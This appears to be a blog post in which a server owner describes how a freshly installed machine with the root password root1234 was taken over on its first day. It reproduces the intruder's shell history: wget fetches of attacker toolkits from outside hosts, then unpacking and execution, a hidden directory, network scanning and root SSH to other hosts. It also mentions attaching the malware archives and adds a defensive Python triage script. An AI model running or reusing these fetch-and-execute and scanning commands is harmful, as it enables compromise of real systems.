A freshly installed server had the "honor" of being visited by a hacker on its very first day

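Recently the number of 千寻影视 users has been growing fairly quickly and the servers were close to their limit, so I bought a new server and took it straight to the data center to install the system. Because it was a fresh install, I set the root password to something very simple, root1234. And a miracle is a miracle: the very next day I could no longer log in. In such a short time it had already been visited by a hacker.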

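This hacker does not seem to have done anything bad. I am posting the traces he left behind here; anyone interested is welcome to dig into them: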

The contents of .bash_history, which he did not even clear. The first thing this friend did after getting in was change the password.

passwd
cd /usr/games
ls -a
wget www.darkkid.webs.com/arhive/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x *
last -10
./bleah 187.109.205.69
./bleah 89.137.248.231
cd ..
wget whitehack.do.am/eyes.tgz ; tar zxvf eyes.tgz ;rm -rf eyes.tgz ; cd .eyes ; chmod +x * ; touch bios.txt
ls -a
last -10
./a 113.106 ; ./a 114.81 ; ./a 101.81
screen
./screen
ping 127.0.0.1
./screen -r
./screen -r
ping 127.0.0.1
w
screen -r
cd /usr/games
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
w
ps x
ls -a
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
cat vuln.txt
ssh -l root 222.93.115.156
nano vuln.txt
ls -a
rm -rf mfu.txt vuln.txt
ps x
cd ..
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
./screen -r
ls -a
cd ..
ls -a
cd scan
ls -a
nano mfu.txt
cat vuln.txt
cd ..
cd .eyes
./screen -r
cd ..
ls -a
cd scan
nano mfu.txt
cd ..
cd .eyes
./screen -r
./screen -r
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
rm -rf bios.txt
cd ..
ls -a
cd scan
ls -a
rm -rf mfu.txt vuln.txt
./go.sh 139
ls -a
cat vuln.txt
exit
cd /usr/games
ls -a
cd scan
ls -a
cat vuln.txt
w
cd ..
ls -a
cd .eyes
./screen -r
w
ps x
kill -9 23629
./screen
ping 127.0.0.1
./screen -r
./screen -r 3707.pts-0.localhost
./screen -r 23782.pts-2.localhost
./screen -r
ps x
ping 127.0.0.1
w
ps x
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
rm -rf mfu.txt vuln.txt
cd ..
cd .eyes
./screen -r

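From the commands you can see that this friend downloaded two files. I am also attaching those two files here in case they become unavailable in the future.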

 

File 1: skdet.tgz File 2: eyes.tgz
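A way to triage a history like the one above automatically, as an added example that is not part of the original post: it tags the password change, the fetch-unpack-chmod chain, the hidden directory, locally run binaries (including one named like a system tool), the outbound root SSH and the forced deletes. The rule names, the regexes and the SYSTEM_TOOLS list are assumptions chosen for this illustration; the sample lines are an excerpt of the posted history.

```python
import re

# Excerpt of the .bash_history lines posted above (order preserved).
HISTORY = """passwd
cd /usr/games
wget www.darkkid.webs.com/arhive/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x *
./bleah 187.109.205.69
cd ..
cd .eyes
./screen -r
ssh -l root 222.93.115.156
rm -rf mfu.txt vuln.txt
ps x
""".splitlines()

# Assumption: names of system tools an intruder may shadow with a local copy.
SYSTEM_TOOLS = {"screen", "ssh", "ps", "ls", "w", "top", "netstat"}

# Heuristic rules (tag, regex) applied to each ';'-separated command.
RULES = [
    ("credential-change", re.compile(r"^(passwd|chpasswd|usermod)\b")),
    ("hidden-directory", re.compile(r"^cd\s+(\S*/)?\.[^./]\S*")),
    ("outbound-root-ssh", re.compile(r"^ssh\b.*(-l\s*root\b|\broot@)")),
    ("forced-delete", re.compile(r"^rm\s+-\w*r\w*f|^rm\s+-\w*f\w*r")),
]

def triage(lines):
    """Return (line_number, tag, command) findings for a shell history."""
    findings = []
    for n, line in enumerate(lines, 1):
        # Whole-line rule: fetch, unpack and mark executable in one chain.
        if re.search(r"\b(wget|curl)\b", line) and "tar " in line and "chmod +x" in line:
            findings.append((n, "download-unpack-exec", line.strip()))
        for cmd in (c.strip() for c in line.split(";")):
            for tag, rx in RULES:
                if rx.search(cmd):
                    findings.append((n, tag, cmd))
            m = re.match(r"^\./(\S+)", cmd)
            if m:  # binary run from the current directory
                tag = "shadows-system-tool" if m.group(1) in SYSTEM_TOOLS else "local-binary"
                findings.append((n, tag, cmd))
    return findings

if __name__ == "__main__":
    for n, tag, cmd in triage(HISTORY):
        print(f"{n:>3}  {tag:<22} {cmd}")
```

A history file is attacker-controlled once root is lost, so an empty result does not clear a host; the findings are leads for checking the file system, the process list and the login records.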
